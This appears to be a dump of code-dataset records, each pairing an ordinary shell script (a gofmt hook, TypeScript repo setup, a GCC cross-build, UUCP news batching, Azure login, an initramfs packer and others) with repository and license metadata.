#!/bin/sh gofiles=$(git diff --cached --name-only --diff-filter=ACM | grep '.go$') [ -z "$gofiles" ] && exit 0 echo "gofmt -s -w $gofiles" unformatted=$(gofmt -l -w $gofiles) [ -z "$unformatted" ] && exit 0 echo >&2 "Info: Running gofmt as some Go files are not formatted with gofmt." for fn in $unformatted; do ...
true
b8e1421672bc93f88ad744f32f48e554a44bc3b6
Shell
SalomonBrys/Scripts
/bin/java_home
UTF-8
189
3.5
4
[]
no_license
#!/bin/sh jcPath=$(which javac 2> /dev/null) if [ $? != 0 ]; then >&2 echo "Could not find javac. Is the JDK installed ?" exit 1 fi realpath $(dirname $(readlink -f $jcPath))/..
true
5c5ee7b3368bda09879384b91e4f56e94d2e6440
Shell
carriejv/init-ts
/init-ts.sh
UTF-8
5,436
4.21875
4
[ "Apache-2.0" ]
permissive
#!/bin/bash # Initializes a new Typescript repo with a minimal config. INITTS_REPO="https://github.com/carriejv/init-ts.git" SPDX_LICENSE_REPO="https://raw.githubusercontent.com/spdx/license-list-data/master/text/" T_PROMPT=`tput setaf 6` T_STEP=`tput setaf 2` T_ERR=`tput setaf 1` T_RESET=`tput sgr0` # Error handle...
true
c6cbc36329ac3466e0072e7aa6ca8050386953ab
Shell
willneedit/rockchip-mkbootimg
/mkcpiogz
UTF-8
303
3.765625
4
[]
no_license
#!/bin/sh # Create initramfs.cpio.gz # Author: Julien Chauveau <julien.chauveau@neo-technologies.fr> # Usage: mkcpiogz <directory> if [ $# != 1 ] || [ ! -d $1 ]; then echo "Usage: ${0##*/} <directory>" ; exit 1 fi cd $1 DIR=$(pwd) IMG=$DIR.cpio.gz sudo sh -c "find . | cpio -H newc -o | gzip -9 > $IMG" echo "Arc...
true
f776ff6af71ca5fcd4f6dc99cde44447ba518b42
Shell
jiajunhuang/4.4BSD-Lite2
/usr/src/contrib/news/inn/samples/send-uucp
UTF-8
2,279
3.53125
4
[ "BSD-4-Clause-UC", "LicenseRef-scancode-other-permissive", "LicenseRef-scancode-warranty-disclaimer" ]
permissive
#! /bin/sh ## $Revision: 1.11 $ ## SH script to send UUCP batches out. ## =()<. @<_PATH_SHELLVARS>@>()= . /var/spool/news/data/innshellvars PROGNAME=`basename $0` LOCK=${LOCKS}/LOCK.${PROGNAME} LOG=${MOST_LOGS}/${PROGNAME}.log MAXJOBS=200 UUXFLAGS="- -r -gd" ## Start logging. test ! -f ${LOG} && touch ${LOG} ch...
true
74edaca7f05aa326a8e97b6c14e5233eabf56df7
Shell
awslabs/libfabric-ci-scripts
/install-nccl-tests.sh
UTF-8
782
2.90625
3
[ "Apache-2.0" ]
permissive
#!/bin/bash NCCL_TESTS_VERSION="v2.0.0" cd $HOME git clone -b "$NCCL_TESTS_VERSION" https://github.com/NVIDIA/nccl-tests pushd nccl-tests # TODO: We need to apply the patch in commit https://github.com/NVIDIA/nccl-tests/commit/0f173234bb2837327d806e9e4de9af3dda9a7043 # to add the LD_LIBRARY_PATH of openmpi shipped in ...
true
b137fc355c64370fe81f502f27e038923d90eccd
Shell
u16suzu/dot_files
/.zsh/setting/command.sh
UTF-8
688
3.421875
3
[]
no_license
### git add と commit を同時にやる git_add_commit(){ zle accept-line git add . && git commit -m $1; } zle -N git_add_commit alias ga="git_add_commit" ### 画像を開く open_image_with_preview(){ zle accept-line if [[ -z "$BUFFER" ]]; then open -a preview $1; fi } zle -N open_image_with_...
true
190e6a35c0628b774671fd1de256acf9a483aeed
Shell
Gimba/BashUtils
/prod_25C
UTF-8
577
3.09375
3
[]
no_license
#!/bin/bash if [ ! -d "productions" ]; then mkdir productions fi infile=${PWD##*/} # if [ "$#" -gt 2 ]; then # infile=$3 # fi # echo $infile path=${PWD} for i in $(seq $1 $2) do last=$((i-1)) pmemd.cuda -O -i /d/as2/u/rm001/BashUtils/InputFiles/prod_25C.in -p $infile.prmtop -c productions/prod_$last.rst -o p...
true
7cfeb119a069291a6d713f2aa70ba5963d0ec376
Shell
janikvonrotz/lorauna
/task
UTF-8
487
3.765625
4
[ "MIT" ]
permissive
#!/bin/sh set -eo pipefail # load env vars if [ -f .env ] then export $(cat .env | sed 's/#.*//g' | xargs) fi function help() { echo echo "$1 <command> [options]" echo echo "commands:" echo column -t -s"|" ./task.md | tail -n +3 echo } function install() { npm install } case "$1" in install) insta...
true
759626cc54e26dd0240f11a61f01721634b29764
Shell
shangwen/StandaloneOnYarn
/bin/standalone-yarn.sh
UTF-8
458
2.828125
3
[]
no_license
#!/usr/bin/env bash SCRIPT_DIR="$(cd "$(dirname "$0")"; pwd)" export STANDALONE_ON_YARN_HOME="$(cd "$SCRIPT_DIR/.."; pwd)" if [ $1 = "startAmServer" ] ; then echo $STANDALONE_ON_YARN_HOME/lib/standalone-yarn-0.1.jar hadoop jar $STANDALONE_ON_YARN_HOME/standalone-yarn-0.1.jar com.jd.bdp.yarn.client.StandaloneYar...
true
edc4195f8cef3898d9d347dfb6796986a16baafc
Shell
mmitrik/github-actions
/login/entrypoint.sh
UTF-8
647
3.5
4
[ "MIT", "LicenseRef-scancode-generic-cla" ]
permissive
#!/bin/bash set -e if [[ -n "$AZURE_SERVICE_APP_ID" ]] && [[ -n "$AZURE_SERVICE_PASSWORD" ]] && [[ -n "$AZURE_SERVICE_TENANT" ]] then az login --service-principal --username "$AZURE_SERVICE_APP_ID" --password "$AZURE_SERVICE_PASSWORD" --tenant "$AZURE_SERVICE_TENANT" else echo "One of the required parameters for ...
true
4a56fb83b39b38b0d51cffb37c9e832c152e9e52
Shell
supreet-s8/VISP
/GuavusTools/bin/INSTALL/list-job-times-new.sh
UTF-8
543
2.84375
3
[]
no_license
#!/bin/bash COL1VIP=`/opt/tps/bin/pmx.py subshell hadoop show config | grep 'master' | awk -F":" '{print $NF}'| sed -e 's/\s//g'` SSH="ssh -q -o ConnectTimeout=10 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null" for i in `$SSH root@$COL1VIP "/opt/tps/bin/pmx.py subshell oozie show config all | grep jobSta...
true
881297d462b2f3b6707c28e4cec1b2f24bf29c20
Shell
liqiang76/tinyos_cxl
/apps/breakfast/bacon/cxUnitTests/cxl/testLink/reliabilityTest.sh
UTF-8
1,261
3.953125
4
[]
no_license
#!/bin/bash #input: src, dest, failure rate p # number of trials (selections of nodes) if [ $# -lt 4 ] then echo "Usage: $0 db src dest failureRate" 1>&2 exit 1 fi db=$1 src=$2 dest=$3 fr=$4 numTrials=10 txPerTrial=20 function sendCommandGeneric(){ delay=$1 id=$2 shift 2 s="$@" for (( i=0; i<${#s}; i+...
true
de82eee35881ed25c48c983fabef270eb07d83fa
Shell
jrkwon/LAB
/workspace_temp/scripts/copy/copy_wflw_images.sh
UTF-8
255
3.046875
3
[ "LicenseRef-scancode-generic-cla", "BSD-2-Clause" ]
permissive
# Copy images from ~/Download and untar FILE=$1 TARGET_DIR=./datasets/$FILE mkdir -p $TARGET_DIR cp ~/Downloads/${FILE}_images.tar.gz $TARGET_DIR/. TAR_FILE_ANNO=$TARGET_DIR/${FILE}_images.tar.gz tar -zxvf $TAR_FILE_ANNO -C $TARGET_DIR rm $TAR_FILE_ANNO
true
623e31751f8f81257cb9abb243292d66f972a306
Shell
scarfacedeb/setup_linux
/install
UTF-8
197
2.9375
3
[]
no_license
#!/usr/bin/env bash # # Install general apps set -e SETUP_ROOT=$(pwd) . functions.sh setup_system () { chsh -s /usr/bin/zsh } #sudo bash -c "source $SETUP_ROOT/apt.sh" . apt.sh setup_system
true
fd992788565ea1d179bbdc616f4a11533d48ffe2
Shell
gfontenot/xcode-cli
/src/commands/xcode-open
UTF-8
981
4.28125
4
[]
no_license
#!/bin/sh error(){ red="\e[1;31m" reset="\e[0m" printf "${red}%s${reset}\n" "$1" >&2 } info(){ printf "%s\n" "$1" } usage='xcode-open Open a directory with Xcode usage: xcode-open [-h | --help] [--current | --beta] [PATH] -h | --help Print this usage documentation and exit --current ...
true
9c82921940ab4aee38ffd2817d5a47c4e691defa
Shell
FlorianHeigl/wp3-image-synthesis
/image-optimizer/src/main/resources/scripts/umountImage.sh
UTF-8
1,134
3.46875
3
[ "Apache-2.0" ]
permissive
#!/bin/bash # Copyright 2009-10 Gabor Kecskemeti, University of Westminster, MTA SZTAKI # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LI...
true
3a179c009826153f5e05147b70126b7806c85a6a
Shell
siberblog/linux
/hands-on/arg.sh
UTF-8
158
2.984375
3
[]
no_license
#! /bin/bash clear function yasi_yaz(){ local dogum_yili read -p "Dogum yili giriniz: " dogum_yili let yas=$1-$dogum_yili echo $yas } yasi_yaz 2020
true
143b655ffd338d06c8c072d8860b1c062b1811a8
Shell
snailium/nanopi_tryout
/duo/00_prepare.sh
UTF-8
157
2.90625
3
[ "MIT" ]
permissive
#! /bin/bash SUDO= if [[ `whoami` != "root" ]]; then SUDO=sudo fi # Install utilities $SUDO apt-get update $SUDO apt-get install -y git build-essential
true
c4f22808c872d7fc9eeec3eefe8b36710c014f1a
Shell
WorkloadAutomation/WADemo
/setup.sh
UTF-8
437
2.90625
3
[ "Apache-2.0" ]
permissive
#!/bin/sh ############################################################################# # Licensed Materials - Property of HCL* # (C) Copyright HCL Technologies Ltd. 2017, 2018 All rights reserved. # * Trademark of HCL Technologies Limited ############################################################################# ...
true
54ff337d442393cb765dccf806bc140d3f1ee211
Shell
webclinic017/gotolong
/gotolong/corpact/corpact_invoke.sh
UTF-8
941
2.78125
3
[ "BSD-2-Clause", "BSD-3-Clause" ]
permissive
#!/bin/sh if test -n "${GOTOLONG_LOGGING_LEVEL}" then LOGGING_LEVEL=${GOTOLONG_LOGGING_LEVEL} else LOGGING_LEVEL=INFO fi CONFIG_GLOBAL_DATA_LOC=`python -m gotolong.config.config_ini global_data` CONFIG_GLOBAL_REPORTS_LOC=`python -m gotolong.config.config_ini global_reports` CONFIG_PROFILE_DATA_LOC=`python -m ...
true
979045a577fb2fbcf34e0cc8a17e946e505da0c5
Shell
faulke/weather-infra
/terraform/prod/deploy.sh
UTF-8
620
3.34375
3
[]
no_license
#!/usr/bin/env bash echo $1 # initialize ami id variable AMI="None" # try getting AMI id until it is available until [ $AMI != "None" ]; do echo "Fetching AMI." AMI="$(aws ec2 describe-images --filters Name=tag:Version,Values=$1 --query Images[0].[ImageId] --output text)" done echo $AMI # get modules terrafor...
true
f597402d3e1f0a1625e7c79afae7c465d6ea9802
Shell
jief666/GccBuild
/BuildScripts/Build-gcc-493-osx_cross_arm-linux-30228
UTF-8
26,024
3.6875
4
[]
no_license
#!/bin/bash # Do not define var in this script. Define tham all in SetupEnv-$BUILDGCC_SUFFIX. # The goal is to be able to copy and paste command from this script to a console. Helped me a lot when debugging step by step if [ -z "$BUILDGCC_BUILD_DIR" ] then echo BUILDGCC_BUILD_DIR not defined exit 1 fi #[ -z "$BU...
true
a8437334f2db4a8a1071685f4e35651d555d548e
Shell
kobigurk/mina-scripts
/find_holes.sh
UTF-8
588
3.28125
3
[]
no_license
LIST=$(docker logs mina_mina-sidecar_1 2>&1 | grep "New tip" | awk '{print $4}' | tr -d '\.') MIN=$(echo $LIST | jq -s min) MAX=$(echo $LIST | jq -s max) EXPECTED=$(seq $MIN $MAX) echo $LIST | tr " " "\n" | uniq | sort -n > /tmp/mina-1 echo $EXPECTED | tr " " "\n" | uniq | sort -n > /tmp/mina-2 DIFF=$(diff --new-line-f...
true
2bede0a125ea7a869449de452029e98a3ce88b1f
Shell
fmidev/rack
/src/configure.sh
UTF-8
4,409
3.890625
4
[ "MIT" ]
permissive
#!/bin/bash # Markus.Peura@fmi.fi CONF_FILE='install-rack.cnf' echo "Creating/updating Rack config file '$CONF_FILE'" echo "(Optionally edited later.)" if [ -f "$CONF_FILE" ]; then cp -vi $CONF_FILE $CONF_FILE.bak source $CONF_FILE fi echo echo -n "# Conf by $USER, " > $CONF_FILE date >> $CONF_FILE echo >> $CONF...
true
6d7b7fbdd5526ac131815ea4006c55d0831d7c70
Shell
migueldvb/arch4edu
/rocm-comgr/PKGBUILD
UTF-8
1,345
2.859375
3
[]
no_license
# Maintainer: Ranieri Althoff <ranisalt+aur at gmail dot com> pkgname=rocm-comgr pkgdesc='Radeon Open Compute - compiler support' pkgver=3.3.0 pkgrel=1 arch=('x86_64') url='https://github.com/RadeonOpenCompute/ROCm-CompilerSupport' license=('custom') makedepends=(cmake git llvm-roc) source=( "rocm-comgr::git+https...
true
046855a2e14122866bd48db587827bcccb32d154
Shell
wesleip/custom
/customworkstation.sh
UTF-8
1,781
2.9375
3
[]
no_license
#!/bin/bash ## Removendo travas eventuiais do apt ## sudo apt-get clean ; sudo rm /var/lib/dpkg/lock-frontend ; sudo rm /var/cache/apt/archives/lock; ## Update dos repositórios ## sudo apt update -y && ## Instalação de pacotes e repositórios ## sudo apt install filezilla git snapd && ## Instalação de pacotes Snap...
true
94e8155cebbb222842c526e323904efe293cd8ec
Shell
brisbane/nrpe
/templates/passive_check_yumupdate.erb
UTF-8
2,056
3.546875
4
[]
no_license
#!/bin/bash PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin PROGNAME=`basename $0` nagiosbox=<%= nagios_server %> send_nsca_config=/etc/nagios/send_nsca.cfg print_usage() { echo "Usage: $PROGNAME" } print_help() { echo -e "This plugin checks whether there are outstanding package...
true
01c244ca40aed8cea97d7f279602fc4d5ec30144
Shell
hngr18/translate
/scripts/translateFrom.sh
UTF-8
504
3
3
[ "MIT" ]
permissive
#!/bin/bash [[ $1 = '' ]] && term="Здраво" || term=$1 [[ $2 = '' ]] && from="serbian" || from=$2 [[ $3 = '' ]] && to="english" || to=$3 user_agent='Mozilla/5.0 (Linux; Linux 4.15.0-55-generic #60-Ubuntu SMP Tue Jul 2 18:22:20 UTC 2019; en-US)' encQuery=$(echo -e $term+$from+to+$to | od -An -tx1 | tr ' ' % | xargs pr...
true
f003b6c9767a27e464fa7e22da72c550b3c7ee50
Shell
gabmartinez/theater-backend
/.docker/deploy.sh
UTF-8
354
2.8125
3
[]
no_license
#!/usr/bin/env bash # Building the container using Dockerfile configuration docker build --file=.docker/Dockerfile -t theater-service . # Stoping if exist a container started docker stop theater-service || true # Launching a latest container created docker run --rm --env-file=.docker/.env -d --name theater-service -...
true
8a168312141dc46c26ee5bfa8c03fa26affb4aab
Shell
Interana/examples
/oomkiller/memoryeater_t7_cgroups_m3xlarge.sh
UTF-8
282
2.90625
3
[]
no_license
#!/bin/bash MY_PID=$$ echo Adding my pid to cgroup : $MY_PID echo $MY_PID | sudo tee /sys/fs/cgroup/memory/interana/cgroup.procs for i in $(seq 1 100); do for j in $(seq 1 2); do (./memoryeater_and_kill 10 300 20 50 > memoryeater_and_kill.$i$j.log 2>&1 &) ; done ; sleep 30; done
true
381d3232656c798d5b0a56d9327173fdfc47b9ed
Shell
bor-attila/fatbox
/scripts/26-sphinxsearch.sh
UTF-8
583
2.890625
3
[]
no_license
#!/bin/bash echo "Installing sphinxsearch ..." wget http://sphinxsearch.com/files/sphinx-3.3.1-b72d67b-linux-amd64.tar.gz -O sphinx.tar.gz tar -xf sphinx.tar.gz rm sphinx.tar.gz mv sphinx-3.3.1 ~/sphinx ## Set SQL server driver name sudo sh -c 'echo "[SQL Server]" > /tmp/odbc' sudo sh -c "tail -n 4 /etc/odbcinst.ini...
true
f423177566ca1e7029ccf7b9c12b3c7cf26a6d5c
Shell
b-berry/lg-scripts
/start-desktop.sh
UTF-8
1,789
3.640625
4
[]
no_license
# TMUX Start Desktop Session TMUX_NAME="desktop" XTEST=$(DISPLAY=:0 xrandr | grep -c " connected") echo "Running xrandr test: $XTEST" case $XTEST in 1) echo "...Found single display, setting up default workspace." xrandr --output eDP1 --mode 1920x1080 --pos 0x0 --rotate normal --output HDMI1 --off --outpu...
true
b63810112e18db09f3e44976e9221ef4994d96bc
Shell
kijisky/zabbix_templates
/snmp-macaddress-table/snmp_macaddr_name.sh
UTF-8
737
3.375
3
[ "MIT" ]
permissive
#!/bin/sh snmp_ipaddress=$1 snmp_comunity=$2 macaddress=$3 bridge_port=`snmpget -Ov -v1 -c $snmp_comunity $snmp_ipaddress 1.3.6.1.2.1.17.4.3.1.2.$macaddress 2>/dev/null` if [ "$bridge_port" = "" ]; then echo Mac Address $macaddress not found; exit; fi; bridge_port=`echo $bridge_port | cut -d':' -f 2 | sed 's/^ ...
true
dd4956c545ca283a929fd7e1558137a371899b3a
Shell
lorenzofailla/Domotic-Linux-Deploy
/scripts/domotic-gettcpreply
UTF-8
1,110
3.875
4
[ "BSD-3-Clause" ]
permissive
#!/bin/bash SCRIPT_NAME="domotic-sendtcpmsg" CONFIG_FILE_PATH="/etc/domotic/domotic.conf" ERRCODE___WRONG_NUMBER_OF_PARAMETERS=1 ERRCODE___NO_CONFIG_FILE=2 # verifica che il numero di argomenti passati in argomento sia corretto # altrimenti stampa un messaggio di errore ed esce if [ $# != 2 ]; then # il numero di ...
true
ba476fa23e6fcc06aeb95fa25d5b91d43fd40d96
Shell
alreece45/docker-images
/ssh-keygen/ubuntu_trusty/opt/init
UTF-8
1,360
3.796875
4
[]
no_license
#!/bin/bash entropy_avail=`cat /proc/sys/kernel/random/entropy_avail` if [ $entropy_avail -lt 256 ] then echo "Warning: Low amount of entropy available: $entropy_avail" fi validates=1 if [ -z "$KEYS_FILE" ] then echo 'Error: $KEYS_FILE (authorized_keys file) undefined' validates=0 fi if [ -z "$KEY_FILE"...
true
6a750a771e7d1748085a189eb3564254dab04fca
Shell
anwyn/systemd.user
/user-environment-generators/jack-environment-generator
UTF-8
953
3.59375
4
[]
no_license
#!/bin/sh doexport= if [ "$1" = "--export" ] then doexport=true shift fi for parm in rate nperiods period device; do name=JACK_$(echo $parm | /usr/bin/tr 'a-z' 'A-Z') # using jack_control will startup jack via dbus, we want to avoid this early in the startup sequence # value=$(/usr/bin/jack_c...
true
0f272d82e935ee8d540f4b04e9dfcd38271c4b62
Shell
lapy/Hassio-Addons
/.scripts/release.sh
UTF-8
1,771
3.953125
4
[ "Apache-2.0" ]
permissive
#!/usr/bin/env bash set -e archs="${ARCHS}" for addon in "$@"; do if [[ "$(jq -r '.image' ${addon}/config.json)" == 'null' ]]; then echo "No build image set for ${addon}. Skip release!" exit 0 fi if [ -z "$archs" ]; then archs=$(jq -r '.arch // ["armv7", "armhf", "amd64", "aarch64", "i386"] | [.[] |...
true